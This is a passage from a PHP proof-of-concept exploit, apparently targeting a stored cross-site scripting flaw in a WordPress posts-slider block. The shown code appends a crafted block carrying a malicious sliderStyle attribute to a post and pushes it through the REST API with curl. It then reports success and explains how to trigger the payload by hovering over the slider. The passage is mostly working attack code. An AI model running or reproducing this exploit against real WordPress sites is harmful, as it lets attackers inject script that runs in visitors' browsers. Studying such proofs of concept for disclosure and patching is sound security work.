    $malicious_block = '<!-- wp:bnm-blocks/posts-slider {"sliderStyle":"' . $malicious_slider_style . '","showSectionHeader":true,"sectionHeader":"Malicious Slider"} -->' . "\n" . '<div class="wp-block-bnm-blocks-posts-slider"></div>' . "\n" . '<!-- /wp:bnm-blocks/posts-slider -->';
    $modified_content = $content . "\n" . $malicious_block;
}

// Update the post with malicious content
$update_data = [
    'content' => $modified_content,
    'id' => $post_id
];

curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($update_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'X-WP-Nonce: ' . wp_create_nonce('wp_rest') // Would need actual nonce in real exploit
]);

$result = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code === 200) {
    echo "Exploit successful! Post $post_id updated with malicious sliderStyle attribute.\n";
    echo "Visit the post to trigger the XSS payload when hovering over the slider.\n";
} else {
    echo "Exploit failed. HTTP code: $http_code\n";
    echo "Response: $result\n";
}

curl_close($ch);

?>
